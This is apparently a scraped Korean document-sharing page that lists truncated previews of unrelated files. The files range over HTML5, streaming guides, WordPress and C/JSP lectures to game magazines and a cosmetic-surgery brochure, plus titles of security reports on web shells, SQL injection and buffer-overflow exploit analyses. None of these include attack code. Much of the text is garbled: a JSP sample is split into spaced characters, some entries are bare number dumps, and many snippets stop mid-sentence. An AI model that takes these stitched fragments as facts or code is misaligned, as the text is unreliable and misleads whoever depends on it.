CHAPTER 13. HTML5 위치정보와드래그앤드롭 SVG SVG(Scalable Vector Graphics) 는 XML- 기반의벡터이미지포맷 웹에서벡터 - 기반의그래픽을정의하는데사용 1999 년부터 W3C 에의하여표준 SVG 의장점 SVG 그래픽은확대되거나크기가변경되어도품질이손상되지않는다. SVG 파일에서모든요소와속성은애니메이션이가능하다. SVG 이미지는어떤텍스트에디터로도생성하고편집할수있다.
More informationHLS(HTTP Live Streaming) 이용가이드 1. HLS 소개 Apple iphone, ipad, ipod의운영체제인 ios에서사용하는표준 HTTP 기반스트리밍프로토콜입니다. 2. HLS 지원대상 - 디바이스 : iphone/ipad/ipod - 운영체제 :
HLS(HTTP Live Streaming) 이용가이드 1. HLS 소개 Apple iphone, ipad, ipod의운영체제인 ios에서사용하는표준 HTTP 기반스트리밍프로토콜입니다. 2. HLS 지원대상 - 디바이스 : iphone/ipad/ipod - 운영체제 : ios 3.0 이상 - 콘텐츠형식 : MP4 (H264,AAC ), MP3 * 디바이스별해상도,
More informationPowerPoint Presentation
WordPress 를이용한웹사이트만들기 2015 년 한지웅 WordPress 를이용한웹사이트만들기 Day 1 Day 2 Day 3 Day 4 Day 5 1. 웹사이트제작기초 HTLM 기본 CSS 기본 WordPress 개론 ( 웹사이트구축툴 ) 2. 웹호스팅 / 웹사이트구축 웹호스팅업체선택 cpanel 설정 WordPress 설치 3. WordPress 기초활용
More informationWeb Scraper in 30 Minutes 강철
Web Scraper in 30 Minutes 강철 발표자 소개 KAIST 전산학과 2015년부터 G사에서 일합니다. 에서 대한민국 정치의 모든 것을 개발하고 있습니다. 목표 웹 스크래퍼를 프레임웍 없이 처음부터 작성해 본다. 목표 웹 스크래퍼를 프레임웍 없이 처음부터 작성해 본다. 스크래퍼/크롤러의 작동 원리를 이해한다. 목표
More information354-437-4..
357 358 4.3% 5.1% 8.2% 6.2% 5.6% 6% 5% 5.3% 96.1% 85.2% 39.6% 50.8% 82.7% 86.7% 28.2% 8.0% 60.0% 60.4% 18,287 16,601 (%) 100 90 80 70 60 50 40 86.6% 80.0% 77.8% 57.6% 89.7% 78.4% 82.1% 59.0% 91.7% 91.4%
More information5장. JSP와 Servlet 프로그래밍을 위한 기본 문법(완성-0421).hwp
1 0 1.7 6 5 'A ' '/ u 4 4 2 2 ' " JS P 프로그래밍 " A ', 'b ', ' 한 ', 9, \ u d 6 5 4 ' c h a r a = 'A '; 0 1 0 2 0 3 0 4 0 5 0 6 0 7 0 8 0 9 1 0 1 1 1 2 1 3 1 4 1 5 1 6 1 7 1 8 1 9 < % @ p a g e c o n te n
More information- 목차 - - ios 개발환경및유의사항. - 플랫폼 ios Project. - Native Controller와플랫폼화면연동. - 플랫폼 Web(js)-Native 간데이터공유. - 플랫폼확장 WN Interface 함수개발. - Network Manager clas
플랫폼사용을위한 ios Native Guide - 목차 - - ios 개발환경및유의사항. - 플랫폼 ios Project. - Native Controller와플랫폼화면연동. - 플랫폼 Web(js)-Native 간데이터공유. - 플랫폼확장 WN Interface 함수개발. - Network Manager class 개발. - Native Controller에서
More information2
2 3 4 5 6 7 8 9 10 am Game 11 12 13 14 15 16 17 18 19 20 21 22 Check List Check List Check List 23 24 25 26 27 28 HOT CLICK 29 30 [ INTERVIEW ] Q Q Q Q Q 31 32 33 34 35 36 37 38 39 40 41 www.khgames.co.kr
More information2
GLOBAL 2 3 4 12TH ANNIVERSARY NEXT G-BUSINESS 5 6 7 SPECIAL GLOBAL1 12TH ANNIVERSARY 8 9 SPECIAL GLOBAL 2 10 11 SPECIAL GLOBAL 3 12TH ANNIVERSARY 12 13 14 15 12TH ANNIVERSARY SPECIAL GLOBAL4 16 17 2006
More information2
2 3 4 5 6 7 8 9 10 am Game 11 12 13 14 15 16 17 18 19 20 21 22 Check List Check List Check List 23 24 25 26 27 28 HOT CLICK 29 30 31 32 33 34 Q Q Q [ INTERVIEW ] Q [ INTERVIEW ] Q Q Q Q 35 36 37 www.khgames.co.kr
More informationMicrosoft PowerPoint - chap02-C프로그램시작하기.pptx
#include int main(void) { int num; printf( Please enter an integer "); scanf("%d", &num); if ( num < 0 ) printf("is negative.\n"); printf("num = %d\n", num); return 0; } 1 학습목표 을 작성하면서 C 프로그램의
More informationThe Pocket Guide to TCP/IP Sockets: C Version
인터넷프로토콜 5 장 데이터송수신 (3) 1 파일전송메시지구성예제 ( 고정크기메시지 ) 전송방식 : 고정크기 ( 바이너리전송 ) 필요한전송정보 파일이름 ( 최대 255 자 => 255byte 의메모리공간필요 ) 파일크기 (4byte 의경우최대 4GB 크기의파일처리가능 ) 파일내용 ( 가변길이, 0~4GB 크기 ) 메시지구성 FileName (255bytes)
More informationuntitled
웹쉘의현황및분석 2007. 2. 본보고서의전부나일부를인용시반드시 [ 자료 : 한국정보보호진흥원 (KISA)] 를명시하여주시기바랍니다. 1. 개요 일반적으로웹서비스에는게시판이나자료실과같은파일을첨부하는기능을포함한다. 이때 txt, jpg, doc와같은데이터파일종류이외에악의적으로제작된스크립트파일인웹쉘을업로드하여해킹하는사고가빈번히발생하고있다. 이와같이서버명령을실행할수있는
More information취약점분석보고서 Simple Web Server 2.2 rc2 Remote Buffer Overflow Exploit RedAlert Team 안상환
취약점분석보고서 Simple Web Server 2.2 rc2 Remote Buffer Overflow Exploit 2012-07-19 RedAlert Team 안상환 목 차 1. 개요... 1 1.1. 취약점분석추진배경... 1 2. Simple Web Server 취약점... 2 2.1. Simple Web Server 취약점개요... 2 2.2. Simple
More informationMicrosoft Word - src.doc
IPTV 서비스탐색및콘텐츠가이드 RI 시스템운용매뉴얼 목차 1. 서버설정방법... 5 1.1. 서비스탐색서버설정... 5 1.2. 컨텐츠가이드서버설정... 6 2. 서버운용방법... 7 2.1. 서비스탐색서버운용... 7 2.1.1. 서비스가이드서버실행... 7 2.1.2. 서비스가이드정보확인... 8 2.1.3. 서비스가이드정보추가... 9 2.1.4. 서비스가이드정보삭제...
More information세르게이의 HTML5&CSS3-내지_ indd
찾아보기 기호및숫자 ::after 128 ::before 128 ::first-letter 112, 113, 128 ::first-line 128 ::first-of-type 127 :checked 126 :disabled 125 :empty 127 :enabled 119 :focus 125 :lang 126 :last-child 127 :link 125 :only-child
More information웹서버보안취약점대응및조치 교육사이버안전센터
웹서버보안취약점대응및조치 2010. 5. 교육사이버안전센터 목차 Ⅰ 웹보안개요 Ⅱ Ⅲ Ⅳ 최신기술동향주요해킹기술및대응방안취약점사고사례 Ⅴ 참고자료 Ⅰ 웹보안개요 I. 웹보안개요 1. 웹구조의이해 URL: 프로토콜 :// 호스트명 [: 포트번호 ]/[ 경로 /] 파일명 [?Param= 값 ] HTTP: // www.ecsc.go.kr / Login.jsp? User=name
More information화판_미용성형시술 정보집.0305
CONTENTS 05/ 07/ 09/ 12/ 12/ 13/ 15 30 36 45 55 59 61 62 64 check list 9 10 11 12 13 15 31 37 46 56 60 62 63 65 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43
More information게시판 스팸 실시간 차단 시스템
오픈 API 2014. 11-1 - 목 차 1. 스팸지수측정요청프로토콜 3 1.1 스팸지수측정요청프로토콜개요 3 1.2 스팸지수측정요청방법 3 2. 게시판스팸차단도구오픈 API 활용 5 2.1 PHP 5 2.1.1 차단도구오픈 API 적용방법 5 2.1.2 차단도구오픈 API 스팸지수측정요청 5 2.1.3 차단도구오픈 API 스팸지수측정결과값 5 2.2 JSP
More information슬라이드 1
Pairwise Tool & Pairwise Test NuSRS 200511305 김성규 200511306 김성훈 200614164 김효석 200611124 유성배 200518036 곡진화 2 PICT Pairwise Tool - PICT Microsoft 의 Command-line 기반의 Free Software www.pairwise.org 에서다운로드후설치
More informationJavascript
1. HTML 이란? HTML 은 Hyper Text Mark Up Language 의약자로예약되어있는각종태그라는명령어를이용하여웹페이지를작성할때사용하는언어입니다. 2. HTML 의기본구조 < 태그 > 내용 < 태그속성 = 변수 > 내용
More informationWEB Hacking 한국디지털미디어고등학교, T eampur e, JT JSOFT 장태 진
WEB Hacking 한국디지털미디어고등학교, T eampur e, JT JSOFT 장태 진 해킹의 종류 웹해킹 네트워크 해킹 시스템(OS)해킹 웹해킹 기법 SQL INJECTION HTML INJECTION Cross Site Scripting HEADER INJECTION 웹해킹 기법 업로드 취약점 다운로드 취약점 INJECTION 나는 사람입니다. 나는
More information2
[ MASTER X MASTER ] 2 3 4 5 6 7 8 9 10 am Game 11 12 Game 13 14 15 16 17 18 19 20 21 22 Check List Check List Check List 23 24 25 www.khgames.co.kr 26 27 28 HOT CLICK 29 30 31 32 33 34 35 36 37 38 39 40
More informationMicrosoft Word - FunctionCall
Function all Mechanism /* Simple Program */ #define get_int() IN KEYOARD #define put_int(val) LD A val \ OUT MONITOR int add_two(int a, int b) { int tmp; tmp = a+b; return tmp; } local auto variable stack
More informationMicrosoft PowerPoint - 11주차_Android_GoogleMap.ppt [호환 모드]
Google Map View 구현 학습목표 교육목표 Google Map View 구현 Google Map 지원 Emulator 생성 Google Map API Key 위도 / 경도구하기 위도 / 경도에따른 Google Map View 구현 Zoom Controller 구현 Google Map View (1) () Google g Map View 기능 Google
More informationSecure Programming Lecture1 : Introduction
Malware and Vulnerability Analysis Lecture1 Malware Analysis #1 Agenda 악성코드정적분석 악성코드분석 악성코드정적분석 정적분석 임의의코드또는응용프로그램을실행하지않고분석 ASCII 문자열 (ex. URL) API 리스트 Packing VT 기타등등 정적분석 : 파일식별 악성으로의심되는파일의형태식별 file
More informationMicrosoft PowerPoint 자바스크립트(1).pptx
웹과인터넷활용및실습 () (Part I) 문양세강원대학교 IT 대학컴퓨터과학전공 강의내용 의기초의기본문법제어구조함수의내장객체브라우저내장객체를이용한다양한효과주기 Page 2 1 개요 사용자와상호작용하는동적웹문서작성웹에서사용할수있도록만들어진스크립트언어선마이크로시스템스와넷스케이프사가공동으로개발 주요특징 웹문서 (HTML 문서 ) 에포함되어웹서버에서브라우저로다운로드됨
More informationSQL Developer Connect to TimesTen 유니원아이앤씨 DB 기술지원팀 2010 년 07 월 28 일 문서정보 프로젝트명 SQL Developer Connect to TimesTen 서브시스템명 버전 1.0 문서명 작성일 작성자
SQL Developer Connect to TimesTen 유니원아이앤씨 DB 팀 2010 년 07 월 28 일 문서정보 프로젝트명 SQL Developer Connect to TimesTen 서브시스템명 버전 1.0 문서명 작성일 2010-07-28 작성자 김학준 최종수정일 2010-07-28 문서번호 20100728_01_khj 재개정이력 일자내용수정인버전
More information3장
C H A P T E R 03 CHAPTER 03 03-01 03-01-01 Win m1 f1 e4 e5 e6 o8 Mac m1 f1 s1.2 o8 Linux m1 f1 k3 o8 AJAX
More information슬라이드 1
QR 코드를통한간편로그인 2018. 11. 7 지도교수 : 이병천교수님 4 조 Security-M 지승우이승용박종범백진이 목 차 조원편성 주제선정 비밀번호가뭐였지? 이런일없이조금더쉽게로그인할수있는방법은없을까? 주제선정 ID와패스워드에의한로그인방식의획기적인변화필요 문자형 ID와패스워드 QR Code 등활용 간편한타겟인식및암기식보안체계의불편극복 인증방식의간소화로다양한분야에서활용가능
More informationBind Peeking 한계에따른 Adaptive Cursor Sharing 등장 엑셈컨설팅본부 /DB 컨설팅팀김철환 Bind Peeking 의한계 SQL 이최초실행되면 3 단계의과정을거치게되는데 Parsing 단계를거쳐 Execute 하고 Fetch 의과정을통해데이터
Bind Peeking 한계에따른 Adaptive Cursor Sharing 등장 엑셈컨설팅본부 /DB 컨설팅팀김철환 Bind Peeking 의한계 SQL 이최초실행되면 3 단계의과정을거치게되는데 Parsing 단계를거쳐 Execute 하고 Fetch 의과정을통해데이터를사용자에게전송하게되며 Parsing 단계에서실행계획이생성된다. Bind 변수를사용하는 SQL
More informationPowerPoint 프레젠테이션
05 장 CSS3 선택자 1. 선택자개요 2. 기본선택자 3. 속성선택자 4. 후손선택자와자손선택자 5. 반응 / 상태 / 구조선택자 CSS 블록을생성할수있다. 선택자를이해하고적절한선택자를활용할수있다. 1 선택자개요 CSS3 선택자 특정한 HTML 태그를선택할때사용하는기능 선택한태그에원하는스타일이나스크립트적용가능 그림 5-1 CSS 블록 CSS 블록 style
More informationmytalk
한국정보보호학회소프트웨어보안연구회 총괄책임자 취약점분석팀 안준선 ( 항공대 ) 도경구 ( 한양대 ) 도구개발팀도경구 ( 한양대 ) 시큐어코딩팀 오세만 ( 동국대 ) 전체적인 그림 IL Rules Flowgraph Generator Flowgraph Analyzer 흐름그래프 생성기 흐름그래프 분석기 O parser 중간언어 O 파서 RDL
More informationchap 5: Trees
5. Threaded Binary Tree 기본개념 n 개의노드를갖는이진트리에는 2n 개의링크가존재 2n 개의링크중에 n + 1 개의링크값은 null Null 링크를다른노드에대한포인터로대체 Threads Thread 의이용 ptr left_child = NULL 일경우, ptr left_child 를 ptr 의 inorder predecessor 를가리키도록변경
More information쉽게 풀어쓴 C 프로그래밍
CHAPTER 10. DOM 과이벤트처리, 입력검 증 문서객체모델 (DOM) DOM 은 HTML 문서의계층적인구조를트리 (tree) 로표현 DOM 과 BOM HTML 문서를객체로표현한것을 DOM 웹브라우저를객체로표현한것을 BOM(Browser Object Model) HTML 요소찾기 동적인웹페이지를작성하려면원하는요소를찾아야한다. id 로찾기 태그이름으로찾기
More information<443A5C4C C4B48555C B3E25C32C7D0B1E25CBCB3B0E8C7C1B7CEC1A7C6AE425CBED0C3E0C7C1B7CEB1D7B7A55C4C656D70656C2D5A69762E637070>
/* */ /* LZWIN.C : Lempel-Ziv compression using Sliding Window */ /* */ #include "stdafx.h" #include "Lempel-Ziv.h" 1 /* 큐를초기화 */ void LZ::init_queue(void) front = rear = 0; /* 큐가꽉찼으면 1 을되돌림 */ int LZ::queue_full(void)
More information<4D F736F F F696E74202D20B8AEB4AABDBA20BFC0B7F920C3B3B8AEC7CFB1E22E BC8A3C8AF20B8F0B5E55D>
리눅스 오류처리하기 2007. 11. 28 안효창 라이브러리함수의오류번호얻기 errno 변수기능오류번호를저장한다. 기본형 extern int errno; 헤더파일 라이브러리함수호출에실패했을때함수예 정수값을반환하는함수 -1 반환 open 함수 포인터를반환하는함수 NULL 반환 fopen 함수 2 유닉스 / 리눅스 라이브러리함수의오류번호얻기 19-1
More informationMicrosoft PowerPoint 웹 연동 기술.pptx
웹프로그래밍및실습 ( g & Practice) 문양세강원대학교 IT 대학컴퓨터과학전공 URL 분석 (1/2) URL (Uniform Resource Locator) 프로토콜, 호스트, 포트, 경로, 비밀번호, User 등의정보를포함 예. http://kim:3759@www.hostname.com:80/doc/index.html URL 을속성별로분리하고자할경우
More informationPowerPoint 프레젠테이션
명품웹프로그래밍 1 2 강의목표 1. 자바스크립트언어의요소와구조를이해한다. 2. 자바스크립트코드를웹페이지에삽입하는방법을안다. 3. 자바스크립트로브라우저에출력하고사용자입력받는방법을안다. 4. 자바스크립트에서다루는데이터타입과변수에대해이해한다. 5. 자바스크립트의연산자의종류를알고사용할수있다. 6. 자바스크립트의조건문의종류를알고사용할수있다. 7. 자바스크립트의반복문의종류를알고사용할수있다.
More informationHTML5 웹프로그래밍 입문-개정판
HTML5 웹프로그래밍입문 8 장. 자바스크립트 프로그래밍기초 목차 8.1 자바스크립트시작하기 8.2 자바스크립트기본문법 8.3 자바스크립트제어문및반복문 8.4 자바스크립트함수 2 8.1 자바스크립트시작하기 8.1.1 자바스크립트개요와특징 8.1.2 자바스크립트작성하기 8.1.3 자바스크립트실행및디버깅 3 자바스크립트개요 개요및특징 동적인웹문서, 웹응용프로그램을위한사용자인터페이스개발
More informationTcl의 문법
월, 01/28/2008-20:50 admin 은 상당히 단순하고, 커맨드의 인자를 스페이스(공백)로 단락을 짓고 나열하는 정도입니다. command arg1 arg2 arg3... 한행에 여러개의 커맨드를 나열할때는, 세미콜론( ; )으로 구분을 짓습니다. command arg1 arg2 arg3... ; command arg1 arg2 arg3... 한행이
More information목 차 1. 개 요... 1 1.1. 배경... 1 1.2. 요약... 1 1.3. 정보... 2 1.4. 대상시스템... 2 1.5. 원리... 2 2. 공격 기법 및 기본 개념... 3 2.1. Heap Spray... 3 2.2. Font... 4 3. 공 격..
취약점 분석 보고서 [ Adobe Flash Player 11.3 Kern Table Parsing Integer Overflow - CVE-2012-1535 ] 2012-08-23 RedAlert Team 안상환 목 차 1. 개 요... 1 1.1. 배경... 1 1.2. 요약... 1 1.3. 정보... 2 1.4. 대상시스템... 2 1.5. 원리...
More informationMicrosoft Word - junior.docx
Black Falcon Team 첫번째입팀과제보고서 - Damm Vulnerable Web Application - Name : 박영근 Intro Lesson 1 : Brute Force 4 Lesson 2 : Command Execution 9 Lesson 3 : CSRF. 10 Lesson 4 : Insecure CAPTCHA 13 Lesson 5 : File
More informationPowerPoint 프레젠테이션
Web server porting 2 Jo, Heeseung Web 을이용한 LED 제어 Web 을이용한 LED 제어프로그램 web 에서데이터를전송받아타겟보드의 LED 를조작하는프로그램을작성하기위해다음과같은소스파일을생성 2 Web 을이용한 LED 제어 LED 제어프로그램작성 8bitled.html 파일을작성 root@ubuntu:/working/web# vi
More information<4D F736F F F696E74202D20B5A5C0CCC5CDBAA3C0CCBDBA5F3130C1D6C2F75F32C2F7BDC32E >
6. ASP.NET ASP.NET 소개 ASP.NET 페이지및응용프로그램구조 Server Controls 데이터베이스와연동 8 장. 데이터베이스응용개발 (Page 20) 6.1 ASP.NET 소개 ASP.NET 동적웹응용프로그램을개발하기위한 MS 의웹기술 현재 ASP.NET 4.5까지출시.Net Framework 4.5 에포함 Visual Studio 2012
More informationTTA Journal No.157_서체변경.indd
표준 시험인증 기술 동향 FIDO(Fast IDentity Online) 생체 인증 기술 표준화 동향 이동기 TTA 모바일응용서비스 프로젝트그룹(PG910) 의장 SK텔레콤 NIC 담당 매니저 76 l 2015 01/02 PASSWORDLESS EXPERIENCE (UAF standards) ONLINE AUTH REQUEST LOCAL DEVICE AUTH
More information2
2 3 4 5 6 7 8 9 Mobile Game Publishing 10 Game 11 12 13 14 15 16 17 18 19 20 21 22 Check List Check List Check List 23 24 25 www.khgames.co.kr 26 27 28 HOT CLICK 29 30 31 32 33 34 35 Q [ INTERVIEW ] Q
More informationJAVA 프로그래밍실습 실습 1) 실습목표 - 메소드개념이해하기 - 매개변수이해하기 - 새메소드만들기 - Math 클래스의기존메소드이용하기 ( ) 문제 - 직사각형모양의땅이있다. 이땅의둘레, 면적과대각
JAVA 프로그래밍실습 실습 1) 실습목표 - 메소드개념이해하기 - 매개변수이해하기 - 새메소드만들기 - Math 클래스의기존메소드이용하기 ( http://java.sun.com/javase/6/docs/api ) 문제 - 직사각형모양의땅이있다. 이땅의둘레, 면적과대각선의길이를계산하는메소드들을작성하라. 직사각형의가로와세로의길이는주어진다. 대각선의길이는 Math클래스의적절한메소드를이용하여구하라.
More informationSpring Boot/JDBC JdbcTemplate/CRUD 예제
Spring Boot/JDBC JdbcTemplate/CRUD 예제 오라클자바커뮤니티 (ojc.asia, ojcedu.com) Spring Boot, Gradle 과오픈소스인 MariaDB 를이용해서 EMP 테이블을만들고 JdbcTemplate, SimpleJdbcTemplate 을이용하여 CRUD 기능을구현해보자. 마리아 DB 설치는다음 URL 에서확인하자.
More information대규모 자바스크립트 웹어플리케이션개발하기 with BackboneJS and RequireJS 넷스루개발 2 팀이병주
대규모 자바스크립트 웹어플리케이션개발하기 with BackboneJS and RequireJS 넷스루개발 2 팀이병주 웹사이트 웹어플리케이션 Mission 웹사이트처럼 개발하기에는 문제점이많다 Why?! 복잡하다 양이많다 예제를통해해결책을알아보자 http://pillarlee16.github.com/simpleapp/ 복잡함을해결하자!! 다양한 MV*
More informationAnalytics > Log & Crash Search > Unity ios SDK [Deprecated] Log & Crash Unity ios SDK. TOAST SDK. Log & Crash Unity SDK Log & Crash Search. Log & Cras
Analytics > Log & Crash Search > Unity ios SDK [Deprecated] Log & Crash Unity ios SDK. TOAST SDK. Log & Crash Unity SDK Log & Crash Search. Log & Crash Unity SDK... Log & Crash Search. - Unity3D v4.0 ios
More informationMicrosoft PowerPoint - chap03-변수와데이터형.pptx
#include int main(void) { int num; printf( Please enter an integer: "); scanf("%d", &num); if ( num < 0 ) printf("is negative.\n"); printf("num %d\n", num); return 0; } 1 학습목표 의 개념에 대해 알아본다.
More information5th-KOR-SANGFOR NGAF(CC)
NGAF Firewall Platform 새로운 세상, 새로운 IT, 새로운 보안 SANGFOR 보안 개념 SAN GFO NGF W+ R NG AF WAF WAF 2010년대 IT산업이 급속하게 발전함에 따라 모든 애플리케이션과 서비스, 그리고 기기들은 BYOD, 사물인터넷(IoT), 클라우드 등과 같은 새로운 기술로 인터넷을 통해 연결되고 있습니다. 이는
More information1. VBA 로웹문서접근및웹페이지정보수집하는방법엑셀 VBA 를통해웹페이지또는웹문서에접근하여정보를수정하고데이터를수집하기위해서는아래와같이크게 2 가지방법을사용합니다. 1-A. WinHTTP ( 또는 MSXMLHTTP) 이용 VBA 에서는 WinHTTP 또는 MSXMLHTT
포탈사이트 로그인프로그램 만들기 #3 Copyright 2018 by 오빠두엑셀 0 1. VBA 로웹문서접근및웹페이지정보수집하는방법엑셀 VBA 를통해웹페이지또는웹문서에접근하여정보를수정하고데이터를수집하기위해서는아래와같이크게 2 가지방법을사용합니다. 1-A. WinHTTP ( 또는 MSXMLHTTP) 이용 VBA 에서는 WinHTTP 또는 MSXMLHTTP 를이용하여웹문서또는웹페이지의데이터를수집하고편집할수있는기능을제공합니다.
More information쉽게
Power Java 제 4 장자바프로그래밍기초 이번장에서학습할내용 자바프로그램에대한기초사항을학습 자세한내용들은추후에. Hello.java 프로그램 주석 주석 (comment): 프로그램에대한설명을적어넣은것 3 가지타입의주석 클래스 클래스 (class): 객체를만드는설계도 ( 추후에학습 ) 자바프로그램은클래스들로구성된다. 그림 4-1. 자바프로그램의구조 클래스정의
More information원형연결리스트에대한설명중틀린것은 모든노드들이연결되어있다 마지막에삽입하기가간단한다 헤더노드를가질수있다 최종노드포인터가 NULL이다 리스트의 번째요소를가장빠르게찾을수있는구현방법은무엇인가 배열 단순연결리스트 원형연결리스트 이중연결리스트 단순연결리스트의노드포인터 가마지막노드를
리스트에대한설명중틀린것은 구조체도리스트의요소가될수있다 리스트의요소간에는순서가있다 리스트는여러가지방법으로구현될수있다 리스트는집합과동일하다 다음은순차적표현과연결된표현을비교한것이다 설명이틀린것은 연결된표현은포인터를가지고있어상대적으로크기가작아진다 연결된표현은삽입이용이하다 순차적표현은연결된표현보다액세스시간이많이걸린다 연결된표현으로작성된리스트를 개로분리하기가쉽다 다음은연결리스트에서있을수있는여러가지경우를설명했는데잘못된항목은
More information혼자서일을다하는 JSP. 이젠일을 Servlet 과나눠서한다. JSP와서블릿의표현적인차이 - JSP는 <html> 내에서자바를사용할수있는수단을제공한다. - 서블릿은자바내에서 <html> 을작성할수있는수단을제공한다. - JSP나서블릿으로만웹페이지를작성하면자바와다양한코드가
혼자서일을다하는 JSP. 이젠일을 Servlet 과나눠서한다. JSP와서블릿의표현적인차이 - JSP는 내에서자바를사용할수있는수단을제공한다. - 서블릿은자바내에서 을작성할수있는수단을제공한다. - JSP나서블릿으로만웹페이지를작성하면자바와다양한코드가웹페이지내에뒤섞여있어서웹페이지의화면설계가점점어려워진다. - 서블릿이먼저등장하였으나, 자바내에
More informationISP and CodeVisionAVR C Compiler.hwp
USBISP V3.0 & P-AVRISP V1.0 with CodeVisionAVR C Compiler http://www.avrmall.com/ November 12, 2007 Copyright (c) 2003-2008 All Rights Reserved. USBISP V3.0 & P-AVRISP V1.0 with CodeVisionAVR C Compiler
More information취약점분석보고서 [CyberLink Power2Go name attribute (p2g) Stack Buffer Overflow Exploit] RedAlert Team_ 강동우
취약점분석보고서 [CyberLink Power2Go name attribute (p2g) Stack Buffer Overflow Exploit] 2012-07-19 RedAlert Team_ 강동우 목 차 1. 개요... 1 1.1. 취약점분석추진배경... 1 1.2. Power2Go name Stack Buffer Overflow 취약점요약... 1 2.
More information